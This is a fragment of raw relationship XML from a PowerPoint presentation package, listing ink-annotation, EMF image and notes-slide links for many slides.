Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1841.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink323.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1862.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink321.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1770.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink325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1.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink333.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink328.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink337.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink330.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1461.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink335.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide48.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image187.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18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1.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink332.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink329.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink334.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink338.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1421.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink336.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1231.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink331.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1542.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.emf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44.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image192.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink357.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink348.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink341.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide49.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1541.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image193.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink352.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink343.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink356.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image203.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink340.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink345.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink349.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image197.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image201.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink347.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink353.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1780.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink342.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1830.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink351.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image198.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink355.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1800.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink339.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1820.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink346.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink350.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink354.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink13.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink15.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1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.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink12.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink9.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink14.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink18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1.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink364.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink359.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink368.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink361.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1871.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink366.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink370.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide50.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image206.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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1.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink363.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink360.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink365.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink369.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1861.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink367.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1840.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink362.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image209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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink376.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink371.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink373.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2062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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink375.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink372.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2052.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1850.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink374.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207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77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81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customXml" Target="../ink/ink380.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink385.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image215.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image880.emf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink382.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image213.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide54.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink384.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38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79.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2101.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image760.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image212.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink381.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image214.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink378.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2091.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink383.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink393.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1880.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1920.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink388.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink397.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink390.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1460.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink395.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink399.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide55.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1740.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image189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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink392.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink389.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink394.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink398.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1420.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink396.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1230.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink391.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1540.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1900.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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05.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2001.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image217.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink400.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink409.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image221.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink402.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1970.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink407.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink411.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink415.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide56.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1991.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4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40.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink404.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2081.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image220.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink401.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink406.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink410.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image218.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image222.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1960.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink408.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink414.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1930.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink403.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1981.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2161.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink412.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image219.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink416.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1950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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink422.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image223.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink417.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink419.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2020.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink424.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide57.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image222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90.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink421.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink418.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink423.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1980.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink420.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2031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1.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink430.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2191.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink425.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink434.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink427.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2071.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink432.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide58.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2181.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image220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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink429.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink426.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink431.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2061.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink433.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2030.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink428.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2171.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink440.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2231.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink435.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink437.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2090.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink442.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide59.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink439.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink436.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink441.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2080.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2050.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink438.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 